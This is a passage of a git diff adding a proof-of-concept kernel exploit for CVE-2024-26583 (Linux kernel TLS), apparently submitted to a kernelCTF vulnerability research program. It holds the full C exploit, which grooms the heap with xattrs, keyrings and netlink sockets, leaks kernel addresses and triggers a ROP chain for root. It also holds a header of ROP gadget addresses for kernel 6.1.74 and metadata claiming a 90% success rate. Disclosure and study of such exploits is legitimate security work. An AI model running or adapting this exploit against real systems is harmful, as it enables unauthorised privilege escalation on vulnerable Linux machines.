KEY_CNT KEY_SLAB_CNT*10 +#define KEY2_CNT 199-KEY_CNT + +char *g_high_mem; +char *g_victim_mem; +int g_low_xattr_fds[LOW_XATTR_CNT]; + +static unsigned int g_low_xattr_cnt; + +void create_watches(int fd) +{ + for (int i=0; itv_nsec += usecs * 1000; + + if (ts->tv_nsec >= NSEC_PER_SEC) { + ts->tv_sec++; + ts->tv_nsec -= NSEC_PER_SEC; + } +} + + +char *g_stack1; +char *g_stack2; + +struct child_arg { + int tfd; + int sock; + int delay; + int try; +}; + +int child_recv(void *arg) +{ + struct itimerspec its = { 0 }; + struct child_arg *carg = (struct child_arg *) arg; + + set_cpu(1); + + ts_add(&its.it_value, carg->delay); + + eventfd_write(g_event1, 1); + + timerfd_settime(carg->tfd, 0, &its, NULL); + set_cpu_all(); + + char recv_buf[256]; + memset(recv_buf, 'A', sizeof(recv_buf)); + int ret = recv(carg->sock, recv_buf, 10, 0); + + if (ret < 0) + perror("recv"); + + sleep(10000); + + return 0; +} + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ +#define NETLINK_CNT1 800 +static int netlink_socks[NETLINK_CNT1]; + +void setup_tls(int sock, int is_rx) +{ + if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0) + err(1, "setsockopt"); + + static struct tls12_crypto_info_aes_ccm_128 crypto_info = {.info.version = TLS_1_2_VERSION, .info.cipher_type = TLS_CIPHER_AES_CCM_128}; + + if (setsockopt(sock, SOL_TLS, is_rx ? 
TLS_RX : TLS_TX, &crypto_info, sizeof(crypto_info)) < 0) + err(1, "TLS_TX"); +} + +void sig_handler(int sig, siginfo_t *info, void *ucontext) +{ + printf("Got signal %d from pid %d\n", sig, info->si_pid); +} + +int sender(void *a) +{ + g_sender_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + struct sockaddr_in addr; + memset(&addr, 0, sizeof(addr)); + + if (g_sender_sock < 0) + err(1, "sender socket"); + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(7777); + + if (connect(g_sender_sock, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + + setup_tls(g_sender_sock, 0); + + char buf[256]; + memset(buf, 'B', sizeof(buf)); + int ret = send(g_sender_sock, buf, 100, 0); + sleep(10000); + exit(0); +} + +key_serial_t alloc_key(int id, size_t len, char *buf) +{ + key_serial_t serial; + char desc[256]; + len -= KEY_HEAD_SIZE; + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "user", desc, buf, len, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "key add"); + } + + return serial; +} + +key_serial_t alloc_keyring(int id) +{ + key_serial_t serial; + char desc[512]; + + memset(desc, ' ', 256); + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "keyring", desc, NULL, 0, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "keyring add"); + } + + return serial; +} + +int prepare_netlink_listener(unsigned int port_id) +{ + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_USERSOCK); + if (sock == -1) { + err(1, "socket netlink\n"); + } + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + addr.nl_pid = port_id; + if (bind(sock, (struct sockaddr*)&addr, sizeof(addr))) + err(1, "bind netlink fail\n"); + + return sock; +} + +int g_netlinks[NETLINK_CNT]; +int g_netlinks_send[NETLINK_CNT]; + +void free_netlink(int sock) +{ + recv(sock, g_mmapped_buf, MMAP_SIZE, 0); +} + +void prepare_netlinks() +{ + unsigned int port_id = 0x6666; + for (int i = 0; i < NETLINK_CNT; i++) + { + g_netlinks[i] = prepare_netlink_listener(port_id + i); + + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_USERSOCK); + if (sock == -1) { + err(1, "socket netlink\n"); + } + + g_netlinks_send[i] = sock; + } +} + +int alloc_netlink(unsigned int idx, size_t len, char *buf) +{ + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + addr.nl_pid = 0x6666 + idx; + + ssize_t n = sendto(g_netlinks_send[idx], buf, len - 0x140, MSG_DONTWAIT, (struct sockaddr*)&addr, sizeof(addr)); + + if (n < 0) + err(1, "sendto netlink\n"); + + return g_netlinks[idx]; +} + +unsigned int parse_zoneinfo(char *buf, unsigned int *high, unsigned int *batch) +{ + char *t; + + t = strstr(buf, "zone DMA32"); + t = strstr(t, "cpu: 1"); + t = strstr(t, "count: "); + + unsigned int cnt = atoi(t+7); + + if (high) { + t = strstr(t, "high: "); + *high = atoi(t+6); + } + + if (batch) { + t = strstr(t, "batch: "); + *batch = atoi(t+7); + } + + return cnt; + +} + +unsigned int get_pagecount(unsigned int *high, unsigned int *batch) +{ + static char zibuf[10000]; + static int fdzi = -1; + + if (fdzi < 0) { + fdzi = open("/proc/zoneinfo", 0, O_DIRECT); + if (fdzi < 0) + err(1, "open zoneinfo"); + } + + lseek(fdzi, SEEK_SET, 0); + read(fdzi, zibuf, sizeof(zibuf)); + + return parse_zoneinfo(zibuf, high, batch); +} + +struct list_head { + struct list_head * next; /* 0 0x8 */ + struct list_head * prev; /* 0x8 0x8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 
bytes */ +}; + +struct simple_xattr { + struct list_head list; /* 0 0x10 */ + char * name; /* 0x10 0x8 */ + size_t size; /* 0x18 0x8 */ + char value[]; /* 0x20 0 */ +}; + +unsigned int find_netlink(char *mem, size_t mem_size, unsigned int *which_subpage) +{ + for (int i = 0; i < mem_size; i+= 8) + { + uint64_t *p = (uint64_t *) (mem+i); + + if (*p == 0x4343434343434343L || *p == 0x4444444444444444L) { + *which_subpage = (*p == 0x4343434343434343L) ? 0 : 1; + + printf("Netlink found at offset %d subpage: %d\n", i, *which_subpage); + return *(p+1); + } + } + + errx(1, "Netlink not found"); + +} + +char *find_key(char *mem, size_t mem_size, int *id_ptr) +{ + char *key = NULL; + uint64_t key_kern; + + for (int i = 0; i < mem_size; i+= 8) + { + uint64_t *p = (uint64_t *) (mem+i); + + if ((*p >> 32) == 0xffffffff) { + printf("Found possible key: %p\n", *p); + + if ((*p & 0xfff) == (KEY_TYPE_KEYRING & 0xfff) && (*p >> 32) == 0xffffffff) { + key = (char *) p - 0x98; + key_kern = *(uint64_t *) (key + 0x38) - 0x38; + *id_ptr = atoi(key+0x92); + g_kernel_text = *p - (KEY_TYPE_KEYRING - 0xffffffff81000000L); + + printf("Key found at: %p/%p id: %d kernel text: %p\n", key_kern, key, *id_ptr, g_kernel_text); + break; + } + } + } + + return key; +} + +void flush_pcp(int xattr_fd, unsigned int flush_cnt) +{ + for (unsigned int i = 0; i < (flush_cnt/8); i++) + { + free_xattr_fd(xattr_fd, 10000 + i); + } +} + +void drain_pcp_order0(int xattr_fd, unsigned int cnt) +{ + unsigned int high, batch, pcp1, pcp2; + + pcp1 = get_pagecount(&high, &batch); + +// kmalloc-256 + for (unsigned int i = 0; i < SLAB_CNT*(cnt+2); i++) + { + alloc_xattr_fd(xattr_fd, 40000 + i, 256, g_mmapped_buf); + + pcp2 = get_pagecount(&high, &batch); + + int delta = pcp2 - pcp1; + + if (delta == -1) { + if (--cnt < 1) + break; + } + + pcp1 = pcp2; + } + + if (cnt > 0) + errx(1, "Unable to drain pcp, remaining: %d\n", cnt); + +} + +unsigned int get_fresh_slabs(int xattr_fd) +{ + unsigned int high, batch, pcp1, pcp2; + + + + unsigned int detected = 0; + +// key_jar + for (unsigned int i = 0; i < KEY_CNT; i++) + { + alloc_key(1000+i, 25, g_mmapped_buf); + } + + pcp1 = get_pagecount(&high, &batch); +// kmalloc-192 + for (unsigned int i = 0; i < 21*4; i++) + { + alloc_xattr_fd(xattr_fd, 30000 + i, 192, g_mmapped_buf); + + pcp2 = get_pagecount(&high, &batch); + + int delta = pcp2 - pcp1; + + if (delta == -1) { + detected = 1; + + break; + } + + pcp1 = pcp2; + } + + if (!detected) + errx(1, "Unable to detect new slab for kmalloc-192\n"); + + return (high-pcp2+100); +} + + +unsigned int prepare_pcp(int xattr_fd) +{ + unsigned int high, batch, pcp1, pcp2; + + for (unsigned int i = 0; i < PCP_MMAP_PAGES / 8; i++) + { + alloc_xattr_fd(xattr_fd, 10000 + i, 32000, g_mmapped_buf); + } + + + pcp1 = get_pagecount(&high, &batch); + + unsigned int detected = 0; + for (unsigned int i = 0; i < SLAB_CNT*2000; i++) + { + alloc_xattr_fd(xattr_fd, 20000 + i, 256, g_mmapped_buf); + + pcp2 = get_pagecount(&high, &batch); + + int delta = pcp2 - pcp1; + + if (delta >= (int) (batch - 2)) { + printf("Detected new pcp batch batch: %d high: %d\n", batch, high); + + for (unsigned int j = 0; j < SLAB_CNT*(batch-2) - 3; j++) + { + alloc_xattr_fd(xattr_fd, 20000 + i + j + 1, 256, g_mmapped_buf); + } + + detected = 1; + + break; + } + + pcp1 = pcp2; + } + + if (!detected) + errx(1, "Unable to detect new pcp batch\n"); + + return (high-pcp2+100); +} + +void stage2(struct simple_xattr *xptr, int xattr_fd) +{ + uint64_t our_xattr_id = * (uint64_t *) (xptr->value + 8); + 
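+	// Each sprayed xattr had its index stored at value offset 8 (the
+	// *(uint64_t *)(g_mmapped_buf+8) = i store in main()), so this recovers
+	// which g_low_xattr_fds entry overlaps our remapped victim page.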
printf("Stage 2 xattr size: %d name ptr: %p prev: %p next: %p id: %ld\n", xptr->size, xptr->name, xptr->list.prev, xptr->list.next, our_xattr_id); + + xptr->size = 0xffff; + +// Drain ZONE_NORMAL + size_t sz = 1024*1024*1024; + char *m = mmap(NULL, sz, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (m == MAP_FAILED) + err(1, "mmap highmem"); + + memset(m, 'A', sz); + + + prepare_netlinks(); + + unsigned int i; + unsigned int max = our_xattr_id + XATTR_SLAB_CNT*3; + +// increase node->nr_partial + for (i = 0; i < XATTR_SLAB_CNT*6; i++) + { + if ((i % 2) == 0) + free_xattr_fd(g_low_xattr_fds[i], i); + } + + unsigned int flush_cnt = prepare_pcp(xattr_fd); + +// printf("flush_cnt: %d\n", flush_cnt); + + if (flush_cnt > PCP_MMAP_PAGES) + errx(1, "PCP_MMAP_PAGES too low"); + + + for (i = our_xattr_id+1; i < max; i++) + { + free_xattr_fd(g_low_xattr_fds[i], i); + } + + for (; i < (max + XATTR_SLAB_CNT*3); i++) + { + if ((i % 2) == 0) + free_xattr_fd(g_low_xattr_fds[i], i); + } + +// At this point at least 1 slab previously belonging two xattrs was discarded + + + flush_pcp(xattr_fd, flush_cnt); + + memset(g_mmapped_buf, 'C', 0x1000); + memset(g_mmapped_buf+0x1000, 'D', 0x1000); + + for (int i = 0; i < NETLINK_CNT; i++) + { + *(uint64_t *) (g_mmapped_buf + 8) = i; + *(uint64_t *) (g_mmapped_buf + 0x1008) = i; + alloc_netlink(i, 0x1200, g_mmapped_buf); + } + + read_xattr_fd(g_low_xattr_fds[our_xattr_id], our_xattr_id, g_mmapped_buf, 0xffff); + + unsigned int which_subpage; + unsigned int netlink_id = find_netlink(g_mmapped_buf, MMAP_SIZE, &which_subpage); + + get_fresh_slabs(xattr_fd); + + + free_netlink(g_netlinks[netlink_id]); + + if (which_subpage == 0) + drain_pcp_order0(xattr_fd, 1); + + key_serial_t keyrings[KEY2_CNT]; + + for (i = 0; i < KEY2_CNT; i++) + { + keyrings[i] = alloc_keyring(i); + } + + read_xattr_fd(g_low_xattr_fds[our_xattr_id], our_xattr_id, g_mmapped_buf, 0xffff); + + int our_key_id; + char *key_ptr = find_key(g_mmapped_buf, 0xffff, &our_key_id); + + if (!key_ptr) { + errx(1, "Key not found in memory, aborting !"); + } + + + int ret = syscall(SYS_keyctl, KEYCTL_RESTRICT_KEYRING, keyrings[our_key_id], 0, 0); + if (ret < 0) + perror("keyctl restrict"); + + read_xattr_fd(g_low_xattr_fds[our_xattr_id], our_xattr_id, g_mmapped_buf, 0xffff); + + char *key_restrict = *(char **) (key_ptr + 0xd0); + + printf("Key restrict: %p\n", key_restrict); + + xptr->name = key_restrict; + + close(g_low_xattr_fds[our_xattr_id]); + + time_t t1 = time(NULL); + + char *fname; + asprintf(&fname, "/tmp/x_%d", our_xattr_id / XATTR_CHUNK); + ret = unlink(fname); + + if (ret < 0) + perror("unlink"); + + printf("Unlink took %d seconds\n", time(NULL) - t1); + uint64_t buf[8]; + +/* +0xffffffff812bbdb7: mov rax, qword ptr [rcx + 8] +0xffffffff812bbdbb: test rax, rax +0xffffffff812bbdbe: je 0xffffffff812bbdcf +0xffffffff812bbdc0: mov rsi, qword ptr [rcx] +0xffffffff812bbdc3: lea rdi, [rbp - 0x10] +0xffffffff812bbdc7: mov rdx, r14 +0xffffffff812bbdca: call __x86_indirect_thunk_rax +*/ + buf[0] = kaddr(G1); // RIP + + buf[1] = (uint64_t) xptr->list.next + 0x20; // RCX + + alloc_xattr_fd(xattr_fd, 50000, 64, buf); + + g_rop2_len = prepare_rop2((uint64_t *) g_rop2); + if (g_rop2_len > ROP2_CONST_OFFSET) + err(1, "Stage 2 ROP size too big: %d > %d\n", g_rop2_len, ROP2_CONST_OFFSET); + + memset(g_mmapped_buf, 'Z', 0x1000); + prepare_rop(g_mmapped_buf, buf[1]); + + t1 = time(NULL); + for (int i = 0; i < XATTR_CHUNK*3; i++) + { + alloc_xattr_fd(xattr_fd, 60000+i, 2049, g_mmapped_buf); + } + 
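+// Reallocate the xattr chunks freed by unlink() with kmalloc-4k xattrs
+// carrying the fake stack built in prepare_rop(); the chunk landing at the
+// leaked list.next pointer puts that data at next+0x20, which is exactly
+// where restrict_link->key points.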
+// Trigger RCE + ret = syscall(SYS_add_key, "user", "pwn", "abcd", 4, keyrings[our_key_id]); + + if (ret < 0) + err(1, "add key"); +} + +int one_attempt(int tfd, int tfd2, unsigned int force_delay) +{ + static unsigned int try = 0; + + char *fname; + asprintf(&fname, "/tmp/y_%d", try++); + int xattr_fd = open(fname, O_RDWR|O_CREAT); + if (xattr_fd < 0) + err(1, "xattr open\n"); + + free(fname); + + int tfd3 = timerfd_create(CLOCK_MONOTONIC, 0); + + int sock_serv = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + + if (sock_serv < 0) + err(1, "socket"); + + int flag = 1; + setsockopt(sock_serv, SOL_SOCKET, SO_REUSEADDR, &flag, sizeof(flag)); + + struct sockaddr_in addr, peer_addr; + memset(&addr, 0, sizeof(addr)); + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(7777); + + if (bind(sock_serv, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + listen(sock_serv, 99999); + + + pid_t sender_pid = clone(sender, g_stack2 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, NULL); + + if (sender_pid < 0) + err(1, "clone sender"); + + + socklen_t sz = sizeof(peer_addr); + int sock = accept(sock_serv, &peer_addr, &sz); + + if (sock < 0) + err(1, "accept"); + + set_cpu(0); + + + for (int i = 0; i < PARTIAL_CNT; i++) + { + alloc_xattr_fd(xattr_fd, i, 193, g_mmapped_buf); + } + + +// Prepare victim slab +#define VICTIM_IDX 18 +#define VICTIM_IDX2 VICTIM_IDX+SLAB_CNT + for (int i = 0; i < NEIGH_CNT; i++) + { + if (i == VICTIM_IDX) + setup_tls(sock, 1); + else + alloc_xattr_fd(xattr_fd, i+1000, 193, g_mmapped_buf); + } + + for (int i = 0; i < SLAB_CNT; i++) + { + alloc_xattr_fd(xattr_fd, i+2000, 193, g_mmapped_buf); + } + + +// Empty slab around victim object + for (int i = 0; i < NEIGH_CNT; i++) + { + if (i != VICTIM_IDX && i != VICTIM_IDX2) + free_xattr_fd(xattr_fd, i + 1000); + } + + +// Increase per cpu partial count + for (int i = 0; i < SLAB_CNT*7; i++) + { + if ((i % 4) == 0) + free_xattr_fd(xattr_fd, i); + } + + + if (try < MAX_ATTEMPTS) { + if (madvise(g_high_mem, HIGH_MEM_CHUNK, MADV_PAGEOUT) < 0) + err(1, "madvise"); + g_high_mem += HIGH_MEM_CHUNK; + } else if (g_victim_mem) { + munmap(g_victim_mem, PG_ALLOC_SIZE); + } + + + struct itimerspec its = { 0 }; + + int delay = force_delay; + + if (!delay) { + delay = 28 + (rand() % 4); + } + + + struct child_arg carg = { + .tfd = tfd, + .sock = sock, + .try = try, + .delay = delay + }; + + printf("delay: %d attempt: %d\n", carg.delay, carg.try); + + pid_t pid = clone(child_recv, g_stack1 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, (void *) &carg); + + eventfd_t event_value; + eventfd_read(g_event1, &event_value); + + ts_add(&its.it_value, 1000); + + timerfd_settime(tfd3, 0, &its, NULL); + + uint64_t v1; + read(tfd3, &v1, sizeof(v1)); + + close(sock); + + usleep(100); + + g_victim_mem = mmap((void *) 0x6600000, PG_ALLOC_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (g_victim_mem == MAP_FAILED) + err(1, "mmap"); + + sleep(0.5); + + set_cpu(1); + + int success = 0; + + char *xattr_ptr; + for (int i = 0; i < PG_ALLOC_SIZE; i += 8) + { + uint64_t *p = (uint64_t *) (g_victim_mem + i); + + if (*p) { + if (*p == 0x4242424242424242L) { + xattr_ptr = (char *) p - 0x20; + success = 1; + break; + } + } + } + + if (success) + stage2((struct simple_xattr *) xattr_ptr, xattr_fd); + + set_cpu(0); + + close(sock_serv); + close(g_sender_sock); + close(tfd3); + close(xattr_fd); + + kill(sender_pid, 9); + kill(pid, 9); + + int status; + + if 
(waitpid(pid, &status, 0) < 0) + err(1, "waitpid"); + + if (waitpid(sender_pid, &status, 0) < 0) + err(1, "waitpid"); + + sleep(0.5); + + return success; + +} + +int main(int argc, char **argv) +{ + int ret; + struct rlimit rlim; + unsigned int force_delay = 0; + + system("cat /proc/cpuinfo"); + + g_low_xattr_cnt = LOW_XATTR_CNT; + + if (argc > 1 && !strcmp(argv[1], "debug")) { + g_debug = 1; + } else if (argc > 2) { + int num; + if ((num = atoi(argv[2])) > 0) { + g_low_xattr_cnt = num; + } + + if (argc > 3 && (num = atoi(argv[3])) > 0) { + force_delay = num; + } + } + + setbuf(stdout, NULL); + + rlim.rlim_cur = rlim.rlim_max = 4096; + if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) + err(1, "setrlimit()"); + + g_mmapped_buf = mmap(NULL, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (g_mmapped_buf == MAP_FAILED) { + perror("mmap"); + return 1; + } + + memset(g_mmapped_buf, 0, MMAP_SIZE); + + struct timeval seed_time; + gettimeofday(&seed_time,NULL); + + srand((seed_time.tv_sec * 1000) + (seed_time.tv_usec / 1000)); + + set_cpu(0); + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", + .salg_name = "cryptd(ctr(aes-generic))" + }; + int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0); + + if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + struct sockaddr_alg sa2 = { + .salg_family = AF_ALG, + .salg_type = "aead", + .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))" + }; + + if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + + g_stack1 = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + g_stack2 = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + if (g_stack1 == MAP_FAILED || g_stack2 == MAP_FAILED) { + perror("mmap stack"); + exit(1); + + } + +#define ROP2_MMAP_SIZE 0x4000 + g_rop2 = mmap(NULL, ROP2_MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0); + if (g_rop2 == MAP_FAILED) + err(1, "mmap"); + + + int tfd = timerfd_create(CLOCK_MONOTONIC, 0); + int tfd2 = timerfd_create(CLOCK_MONOTONIC, 0); + create_watches(tfd); + + + g_event1 = eventfd(0, 0); + + printf("parent pid: %d\n", getpid()); + + + mlockall(MCL_CURRENT); + + memset(g_mmapped_buf, 'B', 0x1000); + + g_high_mem = mmap((void *) 0x26600000L, HIGH_MEM_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_SHARED|MAP_POPULATE, -1, 0); + if (g_high_mem == MAP_FAILED) + err(1, "mmap highmem"); + + int xfd = -1; + unsigned int xattr_fd_idx = 0; + + char fname[512]; + for (int i = 0; i < g_low_xattr_cnt; i++) + { + if (i == 0 || (i / XATTR_CHUNK) > xattr_fd_idx) { + xattr_fd_idx = i / XATTR_CHUNK; + if ((i % 10000) == 0) + printf("xattrs %d/%d\n", i, g_low_xattr_cnt); + + snprintf(fname, sizeof(fname), "/tmp/x_%d", xattr_fd_idx); + xfd = open(fname, O_RDWR|O_CREAT, 0600); + if (xfd < 0) + err(1, "xattr open\n"); + + } + + *(uint64_t *) (g_mmapped_buf+8) = i; + + g_low_xattr_fds[i] = alloc_xattr_fd(xfd, i, 2049, g_mmapped_buf); + } + + set_cpu(0); + + while(1) + { + if (one_attempt(tfd, tfd2, force_delay)) + break; + + } + + if (!g_pwned) { + printf("Failed to trigger vuln, try again!\n"); + } + +// Can't exit, everything might crash + while (1) + sleep(1000); + + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/kernelver_6.1.74.h b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/kernelver_6.1.74.h new file mode 100644 index 
000000000..d7e47a72b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/kernelver_6.1.74.h @@ -0,0 +1,26 @@ +#define COPY_USER_GENERIC_STRING 0xffffffff821a0900 +#define PUSH_RDI_JMP_QWORD_RSI_0F 0xffffffff81d3b7c5 +#define FIND_TASK_BY_VPID 0xffffffff811b1e80 +#define POP_RCX 0xffffffff8102789d +#define INIT_CRED 0xffffffff838768e0 +#define PUSH_RSI_JMP_QWORD_RSI_0F 0xffffffff81d20d85 +#define PUSH_RSI_JMP_QWORD_RSI_039 0xffffffff8197d8d7 +#define POP_RSI_RDX_RCX 0xffffffff810d0c8a +#define INIT_NSPROXY 0xffffffff838766a0 +#define SWITCH_TASK_NAMESPACES 0xffffffff811b9910 +#define PUSH_RAX_JMP_QWORD_RCX 0xffffffff814c3b03 +#define POP_RDI_RSI_RDX_RCX 0xffffffff810d0c89 +#define POP_RSI_RDI 0xffffffff81a54d11 +#define POP_RDX_RDI 0xffffffff818b470b +#define AUDIT_SYSCALL_EXIT 0xffffffff81269610 +#define RETURN_VIA_SYSRET 0xffffffff824001d1 +#define MEMCPY 0xffffffff8222ed10 +#define COMMIT_CREDS 0xffffffff811bb4b0 +#define POP_RSI 0xffffffff821f39a4 +#define POP_RSP 0xffffffff811b36eb +#define POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX 0xffffffff810d0c81 +#define POP_RDI 0xffffffff8117de8c +#define POP_RDX 0xffffffff81047d02 +#define RW_BUFFER 0xffffffff84700000 +#define G1 0xffffffff812bb977 +#define KEY_TYPE_KEYRING 0xffffffff83a6ad40 diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/metadata.json b/pocs/linux/kernelctf/CVE-2024-26583_lts/metadata.json new file mode 100644 index 000000000..4fc15f4ba --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp126" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d", + "cve": "CVE-2024-26583", + "affected_versions": [ + "4.20 - 5.15.159", + "4.20 - 6.1.78" + ], + "requirements": { + "attack_surface": [ + ], + "capabilities": [ + ], + "kernel_config": [ + "CONFIG_TLS" + ] + } + }, + "exploits": { + "lts-6.1.74": { + "uses": [ + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "90% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-26583_lts/original.tar.gz new file mode 100644 index 000000000..070200d17 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_lts/original.tar.gz differ